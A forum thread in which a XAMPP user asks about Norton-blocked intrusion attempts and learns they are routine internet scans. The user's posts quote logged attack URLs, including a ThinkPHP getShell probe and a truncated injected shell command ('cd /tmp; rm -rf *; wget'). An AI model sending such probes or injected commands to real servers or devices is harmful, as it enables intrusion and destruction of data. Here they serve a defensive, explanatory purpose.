Intrusion attempts reported by Norton Security

Problems with the Windows version of XAMPP, questions, comments, and anything related.

Intrusion attempts reported by Norton Security

Postby dp2020 » 21. March 2020 09:08

Hi everyone,

I recently installed XAMPP and am quite happy to have found it.
One issue I've been experiencing most days I turn on at least the Apache module: my Norton Security software keeps reporting these blocked "High Severity" intrusion attempts from various IP addresses. Here's an example:

Attack: ThinkPHP getShell Remote Code Execution 2.
Attacking computer: remote IP address, 40868
Attacking URL: My IP address/index.php?s=captcha
Destination address My IP address, 80
The attack was resulted from \DEVICE\HARDDISKVOLUME3\XAMPP\APACHE\BIN\HTTPD.EXE

Not all attacks have the same details although the attack always "was resulted from \DEVICE\HARDDISKVOLUME3\XAMPP\APACHE\BIN\HTTPD.EXE".

So what do you think? Should I be worried? Is there something (like a a setting on my computer) triggering these intrusion attempts?

I'm only using XAMPP on a local computer as recommended.

Thank you for any advice.

Dan
dp2020
 
Posts: 3
Joined: 21. March 2020 08:33
XAMPP version: 3.2.4
Operating System: WIN10

Re: Intrusion attempts reported by Norton Security

Postby gsmith » 23. March 2020 18:07

Sounds like a scan by an evil-doer to me, you will get them all the time looking for known vulnerabilities.

For this ThinkPHP one, https://blog.sucuri.net/2019/04/thinkph ... ution.html

If you're using a vulnerable version of ThinkPHP, you'd be doomed but for Norton blocking it. This is why all internet facing software should be kept up to date. Install & forget is a dangerous practice that most people fall into.
gsmith
 
Posts: 265
Joined: 29. November 2013 18:04
Location: San Diego
XAMPP version: 0.0.0
Operating System: Win 10/2012R VS 14,15,16

Re: Intrusion attempts reported by Norton Security

Postby dp2020 » 24. March 2020 09:59

GSmith,

Thank you for your reply. To be honest I had no idea what ThinkPHP was until today and I don't have it on my computer. I usually keep my installed software up to date.

Here's another one:

CCTV DVR Remote Code Execution
Attacking URL: My computer's IP followed by /shell?cd+/tmp;rm+-rf+*;wget+

or

D-Link Router Command Injection
Attacking URL: MyComputer's IP followed by /HNAP1/

It's not clear to me why I am being triggered so often by these attacks. Having a local server installed is completely new to me.
dp2020
 
Posts: 3
Joined: 21. March 2020 08:33
XAMPP version: 3.2.4
Operating System: WIN10

Re: Intrusion attempts reported by Norton Security

Postby gsmith » 24. March 2020 16:48

You're being targeted because you have an IP. I'm being targeted because I have an IP. Everyone with an IP is targeted, not just you. :)
gsmith
 
Posts: 265
Joined: 29. November 2013 18:04
Location: San Diego
XAMPP version: 0.0.0
Operating System: Win 10/2012R VS 14,15,16

Re: Intrusion attempts reported by Norton Security

Postby dp2020 » 30. March 2020 19:12

I have finally found the reason behind these intrusion attempts: my computer had been for some time connected directly via modem (without a router) so my IP was an easy target.
dp2020
 
Posts: 3
Joined: 21. March 2020 08:33
XAMPP version: 3.2.4
Operating System: WIN10


Return to XAMPP for Windows

Who is online

Users browsing this forum: No registered users and 95 guests